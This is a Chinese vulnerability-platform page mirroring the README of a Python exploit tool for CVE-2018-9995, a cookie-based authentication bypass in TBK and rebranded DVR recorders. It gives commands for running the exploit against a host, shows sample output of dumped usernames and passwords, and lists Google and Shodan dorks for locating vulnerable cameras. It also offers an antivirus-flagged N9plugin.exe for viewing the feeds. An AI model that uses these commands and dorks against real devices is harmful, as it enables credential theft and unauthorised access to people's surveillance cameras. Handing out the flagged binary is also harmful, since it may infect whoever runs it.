漏洞平台

POC详情： ba22661a8a2ee33f85612d2f55758002f5cf7ecd

来源

https://github.com/Pab450/CVE-2018-9995

关联漏洞

标题： TBK DVR4104和DVR4216 安全漏洞 (CVE-2018-9995)
描述：TBK DVR4104和DVR4216都是高清数字录像机设备。 TBK DVR4104和DVR4216中存在安全漏洞。远程攻击者可借助Cookie: uid=admin包头利用该漏洞绕过身份验证。

描述

CVE-2018-9995 Exploit Tool for Python3

介绍

# CVE-2018-9995 Exploit Tool for Python3
This Python script is designed to exploit CVE-2018-9995.
> TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in  1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.

**Please note that this script is provided for educational purposes only**. The security flaw was discovered in 2018, and while many devices have been patched, a significant number of vulnerable devices may still be in circulation.

Shodan has identified approximately **14,000 potentially affected devices**. However, it's essential to note that most of these viewers no longer work with modern search engines, possibly due to the removal of NAPI support.

This script has been tested with various viewers. However, even if you get access, in many cases you won't be able to view these cameras.

To solve this problem, I used the **N9plugin.exe** found on a server where the viewer was set up, along with the [**IE Tab chrome extension**](https://chrome.google.com/webstore/detail/ie-tab/hehijbfgiekmjfkfjpbkbammjbdenadd). It's possible that viewing will work without IE Tab.

I'm making **N9plugin.exe** available in this repository. I'd like to stress that I've used this exe in a closed environment and that it's important that you do the same. On [**Virus Total**](https://www.virustotal.com/gui/file/d16ea58a1a533f9d5ebdb627d40faeb8e716dc82fc674e2d2cff8da6b288ee60/detection) this one is flag 2/71:
```
CrowdStrike Falcon -> Win/grayware_confidence_60% (D)
SecureAge -> Malicious
```
Even if these could be false positives, it's important to be careful. You may be able to find other N9plugins that are safer online. It's up to you to do your research.
## Quick start for the tool
```
git clone https://github.com/pab450/CVE-2018-9995
cd CVE-2018-9995
pip3 install requests argparse
python3 exploit.py 127.0.0.1
```
If the CVE works, it will return:
```
usernameA, passwordA
usernameB, passwordB
...
```
Otherwise, a python error.
### Arguments
- `host`: Specify the target host or IP address.
- `--port (-p)`: Specify an optional port (default is an empty string).
Example:
```
python3 exploit.py 127.0.0.1 --port 9000
```
```
python3 exploit.py 127.0.0.1 -p 9000
```
```
python3 exploit.py 127.0.0.1
```
## Few Dorks to find devices with potential vulnerabilities
Google:
```
inurl:device.rsp -in
intitle:"AHD Login"
intitle:"DVR Login"
intitle:"NVR Login"
intitle:"XVR Login"
```
Shodan:
```
html:login.rsp
login.rsp
```
## Plus
It is also possible to completely rewrite the firmware of these devices.

文件快照


 [4.0K]  /data/pocs/ba22661a8a2ee33f85612d2f55758002f5cf7ecd
├── [ 670]  exploit.py
├── [1.5M]  N9plugins.exe
└── [2.8K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。